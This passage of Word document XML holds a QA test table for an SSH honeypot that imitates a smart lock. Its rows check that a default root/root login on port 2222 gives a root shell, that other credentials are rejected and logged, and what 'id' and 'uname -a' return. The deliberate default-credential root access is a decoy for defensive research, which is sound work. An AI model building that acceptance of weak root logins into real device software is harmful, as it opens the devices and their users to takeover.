              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Actual Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="758" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Status</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w:rsidRPr="005C6601" w14:paraId="466DC6E6" w14:textId="77777777" w:rsidTr="005C6601">
        <w:trPr>
          <w:trHeight w:val="877"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="641" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">HB-SSH-001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="974" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">SSH Honeypot (Smart Lock)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1466" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Verify a default credential is accepted and the shell is presented</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1396" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Stack running; port 2222 open</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1575" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">ssh root@host -p 2222</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1114" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">root / root</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1513" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Banner and root prompt</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1709" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">SmartLock-OS banner; prompt root@smartlock:~#</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="758" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Pass</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w:rsidRPr="005C6601" w14:paraId="466DC6E6" w14:textId="77777777" w:rsidTr="005C6601">
        <w:trPr>
          <w:trHeight w:val="877"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="641" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">HB-SSH-002</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="974" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">SSH Honeypot (Smart Lock)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1466" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Verify unknown credentials are rejected</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1396" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Stack running</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1575" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">ssh alice@host -p 2222</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1114" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">alice / Str0ng!99</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1513" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">AUTH_FAILED, attempt logged</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1709" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Authentication failed; auth event success=false</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="758" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Pass</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w:rsidRPr="005C6601" w14:paraId="466DC6E6" w14:textId="77777777" w:rsidTr="005C6601">
        <w:trPr>
          <w:trHeight w:val="877"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="641" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">HB-SSH-003</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="974" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">SSH Honeypot (Smart Lock)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1466" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Verify 'id' returns a root identity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1396" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Logged in as root</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1575" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Type id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1114" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1513" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">uid=0(root) gid=0(root)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1709" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">uid=0(root) gid=0(root) groups=0(root)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="758" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Pass</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w:rsidRPr="005C6601" w14:paraId="466DC6E6" w14:textId="77777777" w:rsidTr="005C6601">
        <w:trPr>
          <w:trHeight w:val="877"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="641" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">HB-SSH-004</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="974" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">SSH Honeypot (Smart Lock)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1466" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Verify 'uname -a' returns ARM device information</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1396" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Logged in as root</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1575" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Type uname -a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1114" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">uname -a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1513" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Linux smartlock … armv7l</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1709" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Linux smartlock 4.14.98 #1 SMP PREEMPT … armv7l GNU/Linux</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="758" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
